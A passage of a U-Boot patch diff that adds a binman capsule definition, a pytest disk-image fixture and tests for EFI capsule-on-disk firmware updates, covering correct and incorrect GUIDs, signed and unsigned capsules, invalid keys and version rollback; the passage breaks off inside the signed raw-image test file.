+ load = <0>; + text { + text = "u-boot-env:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + }; + }; + }; + + capsule1 { + filename = "Test04"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule2 { + filename = "Test05"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_INCORRECT_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule3 { + filename = "Test104"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule4 { + filename = "Test105"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule5 { + filename = "Test13"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule6 { + filename = "Test14"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_INVAL_KEY; + public-key-cert = CAPSULE_INVAL_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule7 { + filename = "Test114"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule8 { + filename = "Test115"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; +}; diff --git a/test/py/tests/test_efi_capsule/conftest.py b/test/py/tests/test_efi_capsule/conftest.py new file mode 100644 index 00000000000..61eab5112a1 --- /dev/null +++ b/test/py/tests/test_efi_capsule/conftest.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI capsule test.""" + +import os + +from subprocess import call, check_call, CalledProcessError +import pytest +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR, EFITOOLS_PATH + +@pytest.fixture(scope='session') +def efi_capsule_data(request, u_boot_config): + """Set up a file system and return path to image. + + The function sets up a file system to be used in UEFI capsule and + authentication test and returns a path to disk image to be used + for testing. + + request -- Pytest request object. + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + data_dir = mnt_point + CAPSULE_DATA_DIR + install_dir = mnt_point + CAPSULE_INSTALL_DIR + image_path = u_boot_config.persistent_data_dir + '/test_efi_capsule.img' + + try: + # Create a target device + check_call('dd if=/dev/zero of=./spi.bin bs=1MiB count=16', shell=True) + + check_call('rm -rf %s' % mnt_point, shell=True) + check_call('mkdir -p %s' % data_dir, shell=True) + check_call('mkdir -p %s' % install_dir, shell=True) + + capsule_auth_enabled = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + key_dir = u_boot_config.source_dir + '/board/sandbox' + if capsule_auth_enabled: + # Get the keys from the board directory + check_call('cp %s/capsule_priv_key_good.key %s/SIGNER.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_good.crt %s/SIGNER.crt' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_esl_good.esl %s/SIGNER.esl' + % (key_dir, data_dir), shell=True) + + check_call('cp %s/capsule_priv_key_bad.key %s/SIGNER2.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_bad.crt %s/SIGNER2.crt' + % (key_dir, data_dir), shell=True) + + # Update dtb to add the version information + check_call('cd %s; ' + 'cp %s/test/py/tests/test_efi_capsule/version.dtso .' + % (data_dir, u_boot_config.source_dir), shell=True) + + if capsule_auth_enabled: + check_call('cd %s; ' + 'cp %s/arch/sandbox/dts/test.dtb test_sig.dtb' + % (data_dir, u_boot_config.build_dir), shell=True) + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dtso; ' + 'fdtoverlay -i test_sig.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir), shell=True) + else: + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dtso; ' + 'fdtoverlay -i %s/arch/sandbox/dts/test.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir, u_boot_config.build_dir), shell=True) + + # two regions: one for u-boot.bin and the other for u-boot.env + check_call('cd %s; echo -n u-boot:Old > u-boot.bin.old; echo -n u-boot:New > u-boot.bin.new; echo -n u-boot-env:Old > u-boot.env.old; echo -n u-boot-env:New > u-boot.env.new' % data_dir, + shell=True) + + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/scripts/dtc/pylibfdt' % u_boot_config.build_dir + check_call('cd %s; ' + 'cc -E -I %s/include -x assembler-with-cpp -o capsule_gen_tmp.dts %s/test/py/tests/test_efi_capsule/capsule_gen_binman.dts; ' + 'dtc -I dts -O dtb capsule_gen_tmp.dts -o capsule_binman.dtb;' + % (data_dir, u_boot_config.source_dir, u_boot_config.source_dir), shell=True) + check_call('cd %s; ' + './tools/binman/binman --toolpath %s/tools build -u -d %s/capsule_binman.dtb -O %s -m --allow-missing -I %s -I ./board/sandbox -I ./arch/sandbox/dts' + % (u_boot_config.source_dir, u_boot_config.build_dir, data_dir, data_dir, data_dir), shell=True) + check_call('cp %s/Test* %s' % (u_boot_config.build_dir, data_dir), shell=True) + os.environ['PYTHONPATH'] = pythonpath + + # Create a disk image with EFI system partition + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat %s %s' % + (mnt_point, image_path), shell=True) + check_call('sgdisk %s -A 1:set:0 -t 1:C12A7328-F81F-11D2-BA4B-00A0C93EC93B' % + image_path, shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -rf %s' % mnt_point, shell=True) + call('rm -f %s' % image_path, shell=True) + call('rm -f ./spi.bin', shell=True) diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py new file mode 100644 index 00000000000..016274533cd --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py @@ -0,0 +1,183 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for FIT images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.buildconfigspec('efi_capsule_firmware_fit') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareFit(): + """Test capsule-on-disk firmware update for FIT images + """ + + def test_efi_capsule_fw1( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. + ubman.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test05'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + # reboot + ubman.restart_uboot(expect_reset = capsule_early) + + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + disk_img = efi_capsule_data + capsule_files = ['Test04'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + ubman.restart_uboot(expect_reset = capsule_early) + + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + expected = 'u-boot:Old' if capsule_auth else 'u-boot:New' + verify_content(ubman, '100000', expected) + + expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New' + verify_content(ubman, '150000', expected) + + def test_efi_capsule_fw3( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test104'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + if capsule_auth: + # capsule authentication failed + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + else: + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_fw4( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 4 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + but fw_version is lower than lowest_supported_version + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test105'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py new file mode 100644 index 00000000000..b8cb483b380 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py @@ -0,0 +1,240 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +""" U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + check_file_exist, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareRaw: + """ Tests verifying capsule-on-disk firmware update for raw images + """ + + def test_efi_capsule_fw1( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. + ubman.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test03'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + ubman.restart_uboot() + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash but with OsIndications unset + No update should happen unless CONFIG_EFI_IGNORE_OSINDICATIONS is set + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, None) + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + ubman.restart_uboot() + + ignore_os_indications = u_boot_config.buildconfig.get( + 'config_efi_ignore_osindications') + need_reboot = True if ignore_os_indications else False + + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files, need_reboot) + + if not ignore_os_indications: + check_file_exist(ubman, disk_img, capsule_files) + + expected = 'u-boot:New' if (ignore_os_indications and not capsule_auth) else 'u-boot:Old' + verify_content(ubman, '100000', expected) + + expected = 'u-boot-env:New' if (ignore_os_indications and not capsule_auth) else 'u-boot-env:Old' + verify_content(ubman, '150000', expected) + + def test_efi_capsule_fw3( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + ubman.restart_uboot(expect_reset = capsule_early) + + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '9E339473-C2EB-530A-A69B-0CD6BBBED40E' in ''.join(output) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + + check_file_removed(ubman, disk_img, capsule_files) + + expected = 'u-boot:Old' if capsule_auth else 'u-boot:New' + verify_content(ubman, '100000', expected) + + expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New' + verify_content(ubman, '150000', expected) + + def test_efi_capsule_fw4( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 4 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test101', 'Test102'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + init_content(ubman, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted anyway + check_file_removed(ubman, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + if capsule_auth: + # capsule authentication failed + verify_content(ubman, '100000', 'u-boot:Old') + verify_content(ubman, '150000', 'u-boot-env:Old') + else: + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '985F2937-7C2E-5E9A-8A5E-8E063312964B' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '9E339473-C2EB-530A-A69B-0CD6BBBED40E' in ''.join(output) + assert 'ESRT: fw_version=10' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_fw5( + self, u_boot_config, ubman, efi_capsule_data): + """ Test Case 5 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + but fw_version is lower than lowest_supported_version + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test103'] + with ubman.log.section('Test Case 5-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py new file mode 100644 index 00000000000..29545c5080a --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py @@ -0,0 +1,193 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Linaro Limited +# Copyright (c) 2022, Arm Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org>, +# adapted to FIT images by Vincent Stehlé <vincent.stehle@arm.com> + +"""U-Boot UEFI: Firmware Update (Signed capsule with FIT images) Test +This test verifies capsule-on-disk firmware update +with signed capsule files containing FIT images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.buildconfigspec('efi_capsule_firmware_fit') +@pytest.mark.buildconfigspec('efi_capsule_authenticate') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareSignedFit(): + """Capsule-on-disk firmware update test + """ + + def test_efi_capsule_auth1( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 1 + Update U-Boot on SPI Flash, FIT image format + x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test13'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 2 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test14'] + with ubman.log.section('Test Case 2-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted any way + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 3 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with ubman.log.section('Test Case 3-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + # deleted any way + check_file_removed(ubman, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(ubman, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test114'] + with ubman.log.section('Test Case 4-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + output = ubman.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '46610520-469E-59DC-A8DD-C11832B877EA' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(ubman, '100000', 'u-boot:New') + verify_content(ubman, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test115'] + with ubman.log.section('Test Case 5-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(ubman, capsule_files) + + do_reboot_dtb_specified(u_boot_config, ubman, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with ubman.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(ubman, disk_img, capsule_files) + + check_file_removed(ubman, disk_img, capsule_files) + + verify_content(ubman, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py new file mode 100644 index 00000000000..a500c499bb9 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py @@ -0,0 +1,192 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update (Signed capsule with raw images) Test +This test verifies capsule-on-disk firmware update +with signed capsule files containing raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_authenticate') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareSignedRaw(): + """Firmware Update (Signed capsule with raw images) Test + """ + + def test_efi_capsule_auth1( + self, u_boot_config, ubman, efi_capsule_data): + """Test Case 1 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test11'] + with ubman.log.section('Test Case 1-a, before reboot'): + capsule_setup(ubman, disk_img, '0x0000000000000004') + init_content(ubman, '100000', 'u-boot.bin.old', 'Old') + 